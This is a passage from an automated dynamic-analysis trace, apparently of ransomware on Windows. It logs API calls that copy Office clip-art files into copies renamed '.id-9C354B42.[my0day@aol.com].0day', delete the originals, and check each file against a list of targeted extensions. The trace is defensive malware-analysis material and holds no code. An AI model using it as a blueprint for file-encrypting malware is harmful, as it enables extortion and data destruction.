lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x19ec, lpOverlapped=0x0) returned 1 [0056.585] WriteFile (in: hFile=0x238, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x19f0, lpOverlapped=0x0) returned 1 [0056.586] ReadFile (in: hFile=0x21c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0056.586] WriteFile (in: hFile=0x238, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.586] SetEndOfFile (hFile=0x238) returned 1 [0056.586] CloseHandle (hObject=0x238) returned 1 [0056.588] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.588] SetEndOfFile (hFile=0x21c) returned 1 [0056.589] CloseHandle (hObject=0x21c) returned 1 [0056.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.590] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf")) returned 1 [0056.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0056.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0056.590] lstrlenW (lpString=".doc") returned 4 [0056.590] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.590] lstrlenW (lpString=".docx") returned 5 [0056.590] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.590] lstrlenW (lpString=".pdf") returned 4 [0056.590] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.590] lstrlenW (lpString=".xls") returned 4 [0056.590] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.590] lstrlenW (lpString=".xlsx") returned 5 [0056.590] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.590] lstrlenW (lpString=".ppt") returned 4 [0056.590] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0056.590] lstrlenW (lpString=".zip") returned 4 [0056.590] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.591] lstrlenW (lpString=".rar") returned 4 [0056.591] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.591] lstrlenW (lpString=".bz2") returned 4 [0056.591] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.591] lstrlenW (lpString=".7z") returned 3 [0056.591] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0056.591] lstrlenW (lpString=".dbf") returned 4 [0056.591] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0056.591] lstrlenW (lpString=".1cd") returned 4 [0056.591] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0056.591] lstrlenW (lpString=".jpg") returned 4 [0056.591] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.691] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.691] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0056.691] GetLastError () returned 0x0 [0056.691] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x1df4, lpOverlapped=0x0) returned 1 [0056.725] WriteFile (in: hFile=0x238, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x1e00, lpOverlapped=0x0) returned 1 [0056.726] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0056.726] WriteFile (in: hFile=0x238, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.726] SetEndOfFile (hFile=0x238) returned 1 [0056.726] CloseHandle (hObject=0x238) returned 1 [0056.742] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.748] SetEndOfFile (hFile=0x1c4) returned 1 [0056.764] CloseHandle (hObject=0x1c4) returned 1 [0056.770] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.788] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf")) returned 1 [0056.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0056.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0056.789] lstrlenW (lpString=".doc") returned 4 [0056.789] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.789] lstrlenW (lpString=".docx") returned 5 [0056.789] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.789] lstrlenW (lpString=".pdf") returned 4 [0056.789] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.789] lstrlenW (lpString=".xls") returned 4 [0056.789] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.789] lstrlenW (lpString=".xlsx") returned 5 [0056.789] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.789] lstrlenW (lpString=".ppt") returned 4 [0056.789] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0056.789] lstrlenW (lpString=".zip") returned 4 [0056.789] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.789] lstrlenW (lpString=".rar") returned 4 [0056.789] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.789] lstrlenW (lpString=".bz2") returned 4 [0056.789] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.789] lstrlenW (lpString=".7z") returned 3 [0056.789] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0056.789] lstrlenW (lpString=".dbf") returned 4 [0056.789] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0056.789] lstrlenW (lpString=".1cd") returned 4 [0056.790] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63 [0056.790] lstrlenW (lpString=".jpg") returned 4 [0056.790] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.790] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.790] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0056.790] GetLastError () returned 0x0 [0056.790] ReadFile (in: hFile=0x17c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x138c, lpOverlapped=0x0) returned 1 [0056.805] WriteFile (in: hFile=0x238, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x1390, lpOverlapped=0x0) returned 1 [0056.806] ReadFile (in: hFile=0x17c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0056.806] WriteFile (in: hFile=0x238, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.806] SetEndOfFile (hFile=0x238) returned 1 [0056.806] CloseHandle (hObject=0x238) returned 1 [0056.806] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.806] SetEndOfFile (hFile=0x17c) returned 1 [0056.807] CloseHandle (hObject=0x17c) returned 1 [0056.807] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.807] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf")) returned 1 [0056.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0056.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0056.808] lstrlenW (lpString=".doc") returned 4 [0056.808] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.808] lstrlenW (lpString=".docx") returned 5 [0056.808] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.808] lstrlenW (lpString=".pdf") returned 4 [0056.808] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.808] lstrlenW (lpString=".xls") returned 4 [0056.808] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.808] lstrlenW (lpString=".xlsx") returned 5 [0056.808] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.808] lstrlenW (lpString=".ppt") returned 4 [0056.808] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0056.808] lstrlenW (lpString=".zip") returned 4 [0056.808] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.808] lstrlenW (lpString=".rar") returned 4 [0056.808] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.808] lstrlenW (lpString=".bz2") returned 4 [0056.808] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.808] lstrlenW (lpString=".7z") returned 3 [0056.808] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0056.808] lstrlenW (lpString=".dbf") returned 4 [0056.808] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0056.808] lstrlenW (lpString=".1cd") returned 4 [0056.809] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 63 [0056.809] lstrlenW (lpString=".jpg") returned 4 [0056.809] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.877] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=4870) returned 1 [0056.877] CloseHandle (hObject=0x17c) returned 1 [0056.877] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf")) returned 0x20 [0056.877] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0056.877] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.877] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0056.877] GetLastError () returned 0x0 [0056.877] ReadFile (in: hFile=0x17c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x1306, lpOverlapped=0x0) returned 1 [0056.886] WriteFile (in: hFile=0x238, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x1310, lpOverlapped=0x0) returned 1 [0056.888] ReadFile (in: hFile=0x17c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0056.888] WriteFile (in: hFile=0x238, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.888] SetEndOfFile (hFile=0x238) returned 1 [0056.888] CloseHandle (hObject=0x238) returned 1 [0056.888] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.888] SetEndOfFile (hFile=0x17c) returned 1 [0056.889] CloseHandle (hObject=0x17c) returned 1 [0056.889] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.889] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf")) returned 1 [0056.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0056.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0056.889] lstrlenW (lpString=".doc") returned 4 [0056.889] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.889] lstrlenW (lpString=".docx") returned 5 [0056.889] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.889] lstrlenW (lpString=".pdf") returned 4 [0056.889] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.889] lstrlenW (lpString=".xls") returned 4 [0056.889] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.889] lstrlenW (lpString=".xlsx") returned 5 [0056.889] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.890] lstrlenW (lpString=".ppt") returned 4 [0056.890] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0056.890] lstrlenW (lpString=".zip") returned 4 [0056.890] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.890] lstrlenW (lpString=".rar") returned 4 [0056.890] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.890] lstrlenW (lpString=".bz2") returned 4 [0056.890] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.890] lstrlenW (lpString=".7z") returned 3 [0056.890] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0056.890] lstrlenW (lpString=".dbf") returned 4 [0056.890] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0056.890] lstrlenW (lpString=".1cd") returned 4 [0056.890] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 63 [0056.890] lstrlenW (lpString=".jpg") returned 4 [0056.890] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.890] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.890] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0056.891] GetLastError () returned 0x0 [0056.891] ReadFile (in: hFile=0x17c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x6906, lpOverlapped=0x0) returned 1 [0056.893] WriteFile (in: hFile=0x238, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x6910, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x6910, lpOverlapped=0x0) returned 1 [0056.895] ReadFile (in: hFile=0x17c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0056.895] WriteFile (in: hFile=0x238, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.895] SetEndOfFile (hFile=0x238) returned 1 [0056.895] CloseHandle (hObject=0x238) returned 1 [0056.895] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.895] SetEndOfFile (hFile=0x17c) returned 1 [0056.896] CloseHandle (hObject=0x17c) returned 1 [0056.896] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.896] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf")) returned 1 [0056.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0056.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0056.897] lstrlenW (lpString=".doc") returned 4 [0056.897] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.897] lstrlenW (lpString=".docx") returned 5 [0056.897] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.897] lstrlenW (lpString=".pdf") returned 4 [0056.897] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.897] lstrlenW (lpString=".xls") returned 4 [0056.897] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.897] lstrlenW (lpString=".xlsx") returned 5 [0056.897] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.897] lstrlenW (lpString=".ppt") returned 4 [0056.897] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0056.897] lstrlenW (lpString=".zip") returned 4 [0056.897] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.897] lstrlenW (lpString=".rar") returned 4 [0056.897] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.897] lstrlenW (lpString=".bz2") returned 4 [0056.897] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.897] lstrlenW (lpString=".7z") returned 3 [0056.897] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0056.897] lstrlenW (lpString=".dbf") returned 4 [0056.897] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0056.897] lstrlenW (lpString=".1cd") returned 4 [0056.897] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0056.897] lstrlenW (lpString=".jpg") returned 4 [0056.897] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.898] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.898] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0056.898] GetLastError () returned 0x0 [0056.898] ReadFile (in: hFile=0x17c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x7114, lpOverlapped=0x0) returned 1 [0057.152] WriteFile (in: hFile=0x238, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x7120, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x7120, lpOverlapped=0x0) returned 1 [0057.154] ReadFile (in: hFile=0x17c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0057.154] WriteFile (in: hFile=0x238, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.154] SetEndOfFile (hFile=0x238) returned 1 [0057.154] CloseHandle (hObject=0x238) returned 1 [0057.154] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.154] SetEndOfFile (hFile=0x17c) returned 1 [0057.155] CloseHandle (hObject=0x17c) returned 1 [0057.155] 